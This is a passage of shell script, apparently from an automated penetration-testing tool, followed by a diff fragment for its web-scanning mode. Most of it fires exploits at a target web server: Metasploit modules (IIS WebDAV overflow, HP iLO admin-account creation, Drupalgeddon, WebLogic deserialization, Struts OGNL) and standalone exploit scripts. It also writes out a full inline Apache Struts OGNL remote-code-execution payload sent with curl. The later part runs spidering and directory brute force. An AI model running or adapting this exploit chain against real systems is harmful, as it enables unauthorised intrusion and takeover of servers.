sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port80.raw > $LOOT_DIR/web/jexboss-$TARGET-port80.txt 2> /dev/null
rm -f $LOOT_DIR/web/jexboss-$TARGET-port80.raw 2> /dev/null
cd $INSTALL_DIR
fi
cd $INSTALL_DIR
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "80"; setg SSL false; run; set PATH /uploads/; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "80"; setg SSL false; run; use scanner/http/webdav_website_content; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RPORT "80"; setg SSL false; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "80"; set SSL false; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "80"; set SSL false; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "80"; set SSL false; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT 80; set WAIT 2; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT 80; set SSL false; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 80
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS 2 CVE-2017-5638 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $INSTALL_DIR/bin/apache_struts_cve-2017-5638.py -u http://$TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS 2 CVE-2017-9805 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $INSTALL_DIR/bin/apache_struts_cve-2017-9805.py -u http://$TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE JAKARTA RCE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -s -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" http://$TARGET | head -n 1
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
ruby $INSTALL_DIR/bin/drupalgeddon2.rb http://$TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING CISCO ASA TRAVERSAL CVE-2018-0296 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $INSTALL_DIR/bin/cisco-asa-traversal.py http://$TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JEXBOSS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cd /tmp/
python /usr/share/sniper/plugins/jexboss/jexboss.py -u http://$TARGET
cd $INSTALL_DIR
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING GPON ROUTER EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $INSTALL_DIR/bin/gpon_rce.py http://$TARGET:$PORT 'whoami'
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $INSTALL_DIR/bin/tomcat-cve-2017-12617.py -u http://$TARGET
fi
if [ "$METASPLOIT_EXPLOIT" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "80"; setg SSL false; run; set PATH /uploads/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-http_put.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-http_put.raw > $LOOT_DIR/output/msf-$TARGET-port80-http_put.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port80-http_put.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "80"; setg SSL false; run; use scanner/http/webdav_website_content; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-webdav_website_content.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-webdav_website_content.raw > $LOOT_DIR/output/msf-$TARGET-port80-webdav_website_content.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port80-webdav_website_content.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RPORT "80"; setg SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-iis_webdav_scstoragepathfromurl.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-iis_webdav_scstoragepathfromurl.raw > $LOOT_DIR/output/msf-$TARGET-port80-iis_webdav_scstoragepathfromurl.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port80-iis_webdav_scstoragepathfromurl.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "80"; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-tomcat_utf8_traversal.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-tomcat_utf8_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port80-tomcat_utf8_traversal.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port80-tomcat_utf8_traversal.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "80"; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-apache_optionsbleed.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-apache_optionsbleed.raw > $LOOT_DIR/output/msf-$TARGET-port80-apache_optionsbleed.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port80-apache_optionsbleed.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "80"; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET--port80-hp_ilo_create_admin_account.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET--port80-hp_ilo_create_admin_account.raw > $LOOT_DIR/output/msf-$TARGET--port80-hp_ilo_create_admin_account.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET--port80-hp_ilo_create_admin_account.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING DRUPALGEDDON HTTP PARAMETER SQL INJECTION CVE-2014-3704 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/drupal_drupageddon; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-drupal_drupageddon.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-drupal_drupageddon.raw > $LOOT_DIR/output/msf-$TARGET-port80-drupal_drupageddon.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port80-drupal_drupageddon.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set WAIT 2; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-ms15_034_http_sys_memory_dump.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-ms15_034_http_sys_memory_dump.raw > $LOOT_DIR/output/msf-$TARGET-port80-ms15_034_http_sys_memory_dump.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port80-ms15_034_http_sys_memory_dump.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST "$TARGET"; set RPORT 80; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET--port80-badblue_passthru.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET--port80-badblue_passthru.raw > $LOOT_DIR/output/msf-$TARGET--port80-badblue_passthru.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET--port80-badblue_passthru.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST "$TARGET"; set RPORT 80; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-php_cgi_arg_injection.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-php_cgi_arg_injection.raw > $LOOT_DIR/output/msf-$TARGET-port80-php_cgi_arg_injection.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port80-php_cgi_arg_injection.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOITS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/htp/phpmyadmin_preg_replace; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-phpmyadmin_3522_backdoor.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-phpmyadmin_3522_backdoor.raw > $LOOT_DIR/output/msf-$TARGET-port80-phpmyadmin_3522_backdoor.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port80-phpmyadmin_3522_backdoor.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT CVE-2017-8917 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-joomla_comfields_sqli_rce.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-joomla_comfields_sqli_rce.raw > $LOOT_DIR/output/msf-$TARGET-port80-joomla_comfields_sqli_rce.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port80-joomla_comfields_sqli_rce.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WORDPRESS REST API CONTENT INJECTION CVE-2017-5612 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use auxiliary/scanner/http/wordpress_content_injection; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-wordpress_content_injection.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-wordpress_content_injection.raw > $LOOT_DIR/output/msf-$TARGET-port80-wordpress_content_injection.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port80-wordpress_content_injection.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING ORACLE WEBLOGIC WLS-WSAT DESERIALIZATION RCE CVE-2017-10271 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce; setg RHOST "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-oracle_weblogic_wsat_deserialization_rce.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-oracle_weblogic_wsat_deserialization_rce.raw > $LOOT_DIR/output/msf-$TARGET-port80-oracle_weblogic_wsat_deserialization_rce.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port80-oracle_weblogic_wsat_deserialization_rce.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS JAKARTA OGNL INJECTION CVE-2017-5638 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use multi/http/struts2_content_type_ognl; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-struts2_content_type_ognl.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-struts2_content_type_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port80-struts2_content_type_ognl.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port80-struts2_content_type_ognl.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS 2 SHOWCASE OGNL RCE CVE-2017-9805 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/struts2_rest_xstream; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-struts2_rest_xstream.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-struts2_rest_xstream.raw > $LOOT_DIR/output/msf-$TARGET-port80-struts2_rest_xstream.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port80-struts2_rest_xstream.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS 2 REST XSTREAM RCE CVE-2017-9791 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/struts2_code_exec_showcase; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-struts2_code_exec_showcase.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-struts2_code_exec_showcase.raw > $LOOT_DIR/output/msf-$TARGET-port80-struts2_code_exec_showcase.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port80-struts2_code_exec_showcase.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/tomcat_jsp_upload_bypass; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-tomcat_jsp_upload_bypass.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-tomcat_jsp_upload_bypass.raw > $LOOT_DIR/output/msf-$TARGET-port80-tomcat_jsp_upload_bypass.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port80-tomcat_jsp_upload_bypass.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS 2 NAMESPACE REDIRECT OGNL INJECTION CVE-2018-11776 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/struts2_namespace_ognl; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-struts2_namespace_ognl.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-struts2_namespace_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port80-struts2_namespace_ognl.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port80-struts2_namespace_ognl.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED CISCO ASA TRAVERSAL CVE-2018-0296 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use auxiliary/scanner/http/cisco_directory_traversal; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-cisco_directory_traversal.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-cisco_directory_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port80-cisco_directory_traversal.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port80-cisco_directory_traversal.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/unix/webapp/drupal_drupalgeddon2; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-drupal_drupalgeddon2.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-drupal_drupalgeddon2.raw > $LOOT_DIR/output/msf-$TARGET-port80-drupal_drupalgeddon2.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port80-drupal_drupalgeddon2.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING ORACLE WEBLOGIC SERVER DESERIALIZATION RCE CVE-2018-2628 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/misc/weblogic_deserialize; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-weblogic_deserialize.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-weblogic_deserialize.raw > $LOOT_DIR/output/msf-$TARGET-port80-weblogic_deserialize.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port80-weblogic_deserialize.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING OSCOMMERCE INSTALLER RCE CVE-2018-2628 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/oscommerce_installer_unauth_code_exec; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-oscommerce_installer_unauth_code_exec.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-oscommerce_installer_unauth_code_exec.raw > $LOOT_DIR/output/msf-$TARGET-port80-oscommerce_installer_unauth_code_exec.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port80-oscommerce_installer_unauth_code_exec.raw 2> /dev/null
fi
fi

View File

@ -1,139 +1,249 @@
if [ "$MODE" = "web" ];
then
if [ "$PASSIVE_SPIDER" = "1" ]; then
if [ "$MODE" = "web" ]; then
if [ "$BURP_SCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -X POST \"http://$BURP_HOST:$BURP_PORT/v0.1/scan\" -d \"{\"scope\":{\"include\":[{\"rule\":\"https://$TARGET:443\"}],\"type\":\"SimpleScope\"},\"urls\":[\"https://$TARGET:443\"]}\"$RESET"
fi
curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"https://$TARGET:443\"}],\"type\":\"SimpleScope\"},\"urls\":[\"https://$TARGET:443\"]}"
echo ""
fi
if [ "$PASSIVE_SPIDER" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | sort -u | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null
fi
if [ "$WAYBACKMACHINE" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null
fi
if [ "$BLACKWIDOW" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
blackwidow -u https://$TARGET -l 3 -s y -v y
cat /usr/share/blackwidow/$TARGET*/* >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
blackwidow -u https://$TARGET:443 -l 3 -s y -v n
cat /usr/share/blackwidow/$TARGET*/* 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/weblinks-https-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
fi
if [ "$WEB_BRUTE_COMMONSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_COMMON -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,jsp,pl,cgi,js,css,txt,html,htm
fi
if [ "$WEB_BRUTE_FULLSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
